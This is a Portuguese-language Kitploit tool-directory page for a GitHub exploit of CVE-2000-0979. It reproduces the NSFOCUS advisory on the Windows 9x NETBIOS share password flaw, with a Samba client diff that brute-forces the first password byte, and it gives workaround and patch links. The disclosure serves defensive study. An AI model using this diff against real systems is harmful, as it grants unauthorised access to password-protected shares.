Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
Ferramentas/GitHubGitHub/z6543/cve-2000-0979
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de Penetração
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

Ver Repositório
22há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2000-0979

CVE-2000-0979.rb é a ferramenta autônoma para explorar CVE-2000-0979 contra o serviço SMB do Windows 95.

msf_2000_0979.rb é o módulo do Metasploit. Você pode copiá-lo para ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

MSF module

Mais documentação em breve!

Aviso original

NSFOCUS Security Advisory(SA2000-05)

Tópico: Vulnerabilidade na verificação de senha do protocolo NETBIOS do Microsoft Windows 9x

Data de lançamento: 24 de agosto de 2000 Data de atualização: 11 de outubro de 2000

Sistemas Afetados

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

Sistemas Não Afetados

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

Impacto

Existe uma vulnerabilidade no esquema de verificação de senha utilizado pela implementação do protocolo NETBIOS do Microsoft Windows 9x. Essa vulnerabilidade permitirá que qualquer usuário acesse o serviço de compartilhamento de arquivos do Windows 9x protegido por senha. O atacante não precisa saber a senha do compartilhamento.

Descrição

Você pode definir uma senha para proteger os recursos compartilhados do sistema Microsoft Windows 9x. Mas existe uma vulnerabilidade no esquema de verificação de senha utilizado pela implementação do protocolo NETBIOS do Microsoft Windows 9x. Para verificar a senha, o comprimento da senha depende do comprimento dos dados enviados do cliente para o servidor. Ou seja, se um cliente definir o comprimento da senha como um byte e enviar o pacote com a senha em texto simples para o servidor, o servidor irá comparar apenas com o primeiro byte da senha do compartilhamento (texto simples) e, se forem consistentes, o processo de verificação estará concluído. Tudo o que um atacante precisa fazer é adivinhar e testar o primeiro byte da senha na vítima. O sistema de gerenciamento remoto do Windows 9x também é afetado, pois adota o mesmo método de autenticação de senha compartilhada.

Exploit

Aqui está um exemplo simples para demonstrar esse bug. Obtenha o pacote de código-fonte do samba e modifique source/client/client.c assim:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

       DEBUG(4,(" session setup ok\n"));

+/*
       if (!cli_send_tconX(c, share, "?????",
                           password, strlen(password)+1)) {
               DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
               cli_shutdown(c);
               return NULL;
       }
+*/
+
+      password[0] = 0;
+      c->sec_mode = 0;
+      do{
+
+        password[0]+=1;
+
+      }while(!cli_send_tconX(c, share, "?????", password, 1));

       DEBUG(4,(" tconx ok\n"));

Solução alternativa

Feche o serviço de compartilhamento de arquivos e impressoras da Microsoft.

Solução

A Microsoft foi informada e lançou um boletim de segurança sobre essa falha.

O boletim está disponível em:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

As correções estão disponíveis em:

. Microsoft Windows 95

Correção disponível em breve

. Microsoft Windows 98 e 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

AVISOS LEGAIS

AS INFORMAÇÕES FORNECIDAS SÃO DIVULGADAS PELA NSFOCUS "AS IS", SEM GARANTIA DE QUALQUER TIPO. A NSFOCUS SE ISENTA DE TODAS AS GARANTIAS, EXPRESSAS OU IMPLÍCITAS, EXCETO AS GARANTIAS DE COMERCIABILIDADE. EM NENHUM CASO A NSFOCUS SERÁ RESPONSÁVEL POR QUAISQUER DANOS, INCLUINDO DANOS DIRETOS, INDIRETOS, INCIDENTAIS, CONSEQUENCIAIS, PERDA DE LUCROS COMERCIAIS OU DANOS ESPECIAIS, MESMO QUE A NSFOCUS TENHA SIDO AVISADA DA POSSIBILIDADE DE TAIS DANOS. A DISTRIBUIÇÃO OU REPRODUÇÃO DAS INFORMAÇÕES É PERMITIDA DESDE QUE O ADVISORY NÃO SEJA MODIFICADO DE NENHUMA FORMA.

?Direitos autorais 1999-2000 NSFOCUS. Todos os direitos reservados. Termos de uso.

Equipe de Segurança da NSFOCUS [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

Baixar ferramenta